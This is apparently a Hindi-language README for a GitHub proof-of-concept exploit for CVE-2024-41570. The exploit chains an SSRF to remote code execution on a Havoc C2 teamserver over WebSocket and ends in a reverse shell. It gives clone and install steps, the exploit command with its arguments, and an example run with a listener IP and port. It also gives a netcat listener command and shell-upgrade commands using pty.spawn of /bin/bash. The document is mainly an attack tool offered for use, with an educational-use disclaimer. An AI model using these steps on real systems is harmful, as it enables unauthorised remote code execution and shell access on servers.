
WebSocket के माध्यम से स्वचालित रिवर्स शेल शोषण | Havoc-C2-SSRF RCE के साथ
यह प्रोजेक्ट एक कमजोर वेबसॉकेट-आधारित सेवा का शोषण करने के लिए एक Python-आधारित प्रूफ-ऑफ-कॉन्सेप्ट (PoC) स्क्रिप्ट प्रदान करता है। यह स्क्रिप्ट एजेंट पंजीकरण, वेबसॉकेट पेलोड वितरण और रिवर्स शेल स्थापित करने के लिए दूरस्थ कमांड निष्पादन को स्वचालित करती है।
pip install -r requirements.txt
git clone https://github.com/kit4py/CVE-2024-41570.git
cd CVE-2024-41570
pip install -r requirements.txt
आवश्यक तर्कों के साथ स्क्रिप्ट चलाएं:
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
-t: WebSocket सर्वर का लक्ष्य URL।-i: Havoc से टीम सर्वर का IP पता।-p: Havoc से टीम सर्वर के लिए पोर्ट।-U: WebSocket प्रमाणीकरण के लिए उपयोगकर्ता नाम।-P: WebSocket प्रमाणीकरण के लिए पासवर्ड।-l: रिवर्स शेल के लिए लिसनर IP (आपकी मशीन)।-L: रिवर्स शेल के लिए लिसनर पोर्ट (आपकी मशीन)।python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
nc -lvnp <listener_port>
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color
stty rows 67 columns 318
स्क्रिप्ट को निम्नलिखित Python लाइब्रेरीज़ की आवश्यकता है:
requestspycryptodomeउन्हें इस कमांड का उपयोग करके स्थापित करें:
pip install -r requirements.txt
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। सुनिश्चित करें कि आपके पास लक्ष्य सिस्टम का परीक्षण करने की स्पष्ट अनुमति है। इस स्क्रिप्ट के दुरुपयोग से कानून और नैतिक दिशानिर्देशों का उल्लंघन हो सकता है।
Default Havoc Poc से प्रेरित
योगदान का स्वागत है! रिपॉजिटरी को फोर्क करने और पुल रिक्वेस्ट सबमिट करने में संकोच न करें।
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है। विवरण के लिए LICENSE फ़ाइल देखें।